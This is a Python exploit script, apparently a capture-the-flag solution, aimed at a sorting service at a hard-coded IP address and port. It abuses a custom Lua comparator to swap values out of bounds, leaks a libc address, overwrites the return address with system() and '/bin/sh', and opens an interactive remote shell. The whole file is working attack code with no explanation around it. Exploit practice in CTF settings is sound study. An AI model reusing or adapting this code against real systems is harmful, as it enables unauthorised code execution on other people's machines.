import sys, socket, time, os, re, telnetlib

def get_comparator(n, offset):
    return """
answers = %s
i = 0
function f(a,b)
  i = i + 1
  return answers[i]
end



""" % os.popen("./compute_answers %d %d" % (n, offset)).read().strip()

def wait_for(s):
    while True:
        p = sock.recv(4096)
        if s in p:
            break

def socket_interact(s):
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()

def swap(offset, value):
    n = 1024
    values = [value] + list(xrange(1,n))
    sock.send("7\n" +
              get_comparator(n, n + offset) +
              "1024\n" +
              "\n".join(map(str,values)) + "\n")
    res = None
    while True:
        p = sock.recv(4096)
        m = re.search("Number 1 is now: (\d+)", p)
        if m:
            res = m.group(1)
        if "custom\n:" in p:
            break
    return int(res)

sock = socket.create_connection(("188.40.18.75", 1234))
offset_libc_start_main_ret = 0x19a83
offset_system = 0x3e770
offset_binsh = 0x160264

wait_for("custom\n:")
libc = swap(8, 0x41414141) - offset_libc_start_main_ret
print "[*] leaked libc base =", hex(libc)

print "[*] overwriting return addr"
swap(8, libc + offset_system)
print "[*] set first argument to /bin/sh"
swap(10, libc + offset_binsh)

# trigger return
sock.send("0\n")
sock.recv(4096)
print "[*] Enjoy your shell ;)"
socket_interact(sock)
